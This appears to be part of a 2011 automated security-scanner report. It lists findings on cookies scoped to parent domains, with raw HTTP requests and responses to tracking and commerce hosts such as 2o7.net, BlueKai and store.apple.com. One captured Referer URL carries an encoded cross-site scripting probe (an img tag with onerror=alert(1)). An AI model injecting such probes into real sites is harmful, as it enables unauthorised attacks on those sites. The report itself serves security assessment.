P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 27398
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 03 Feb 2011 17:52:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=DJKOGOICKIGDBAFDJAHHMONP; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=...[SNIP]...; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);
Redirecting to <a HREF="http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920044001/wo/csKICi1o0fYy23BuHZ269hYUg3j/0.">http://store.apple.com/1-800-MY-APPLE/WebObjects/Ap ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B10E0[CE]; Expires=Tue, 2 Feb 2016 20:32:32 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s01692645419389 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:32:32 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B10E0[CE]; Expires=Tue, 2 Feb 2016 20:32:32 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s01692645419389?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 20:32:32 GMT
Last-Modified: Fri, 04 Feb 2011 20:32:32 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www354
Content-Length: 0
Content-Type: text/plain
Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s03453267652075 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 19:50:13 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s03453267652075?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 19:50:13 GMT
Last-Modified: Fri, 04 Feb 2011 19:50:13 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www379
Content-Length: 0
Content-Type: text/plain
Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s04304838050156 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:13 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s04304838050156?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:13 GMT Last-Modified: Fri, 04 Feb 2011 19:50:13 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www298 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F1[CE]; Expires=Tue, 2 Feb 2016 19:50:09 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s07192756696604 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:09 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F1[CE]; Expires=Tue, 2 Feb 2016 19:50:09 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07192756696604?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:09 GMT Last-Modified: Fri, 04 Feb 2011 19:50:09 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www70 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4AFFAE[CE]; Expires=Tue, 2 Feb 2016 19:19:10 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s07964217748958 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:19:10 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4AFFAE[CE]; Expires=Tue, 2 Feb 2016 19:19:10 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:19:10 GMT Last-Modified: Fri, 04 Feb 2011 19:19:10 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www262 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F2[CE]; Expires=Tue, 2 Feb 2016 19:50:10 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s081445949617 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:10 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F2[CE]; Expires=Tue, 2 Feb 2016 19:50:10 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s081445949617?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:10 GMT Last-Modified: Fri, 04 Feb 2011 19:50:10 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www384 Content-Length: 0 Content-Type: text/plain Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/2174 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=s/wmp1UR22QsHNJo; bkc=...[SNIP]...; bkdc=res
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:52:27 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Fri, 04 Feb 2011 20:52:27 GMT Cache-Control: max-age=86400, private Set-Cookie: bk=hgA1oXUR22QsHNJo; expires=Tue, 02-Aug-2011 20:52:27 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=...[SNIP]...; expires=Tue, 02-Aug-2011 20:52:27 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 20:52:27 GMT; path=/; domain=.bluekai.com BK-Server: 1c6d Content-Length: 62 Content-Type: image/gif Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/2491?ss_rand=637007605 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=hgA1oXUR22QsHNJo; bkc=...[SNIP]...; bkdc=res
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/353?rand=0.9526619226671755 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/videoegg/ad.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=UE2gfLUR22QsHNJo; bkc=...[SNIP]...; bkdc=res
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:51:17 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Fri, 04 Feb 2011 20:51:17 GMT Cache-Control: max-age=86400, private Set-Cookie: bk=Rs4UCXUR22QsHNJo; expires=Tue, 02-Aug-2011 20:51:17 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=...[SNIP]...; expires=Tue, 02-Aug-2011 20:51:17 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 20:51:17 GMT; path=/; domain=.bluekai.com BK-Server: a96f Content-Length: 62 Content-Type: image/gif Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/365 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bko=KJpMTsPQAJe62ZPAWmPMRnC3fxhA3xnadgI6Oq/ZLEWyw9s0tOiXKuWLHQR8wCMgekeLm818AYDJaWFPNyv09JtgWxy=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeiItK1DQ2DeZe/OOnucgf4gN2FqcRgzDKHQ1P9ND/VE9yPYr8a3TyHPRwzGIqSi7En/8LKIFfdglEXTgLyXe3guyjs9fIYmxXMSnIwNe2gf3LwuVE1IhC5e8xwE1eaNe2AF7KmjGV/BKOlmdRy9YZD8Gjsn8MXzzrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9/usgtT=; bk=viY1yZVZbt/sHNJo; 
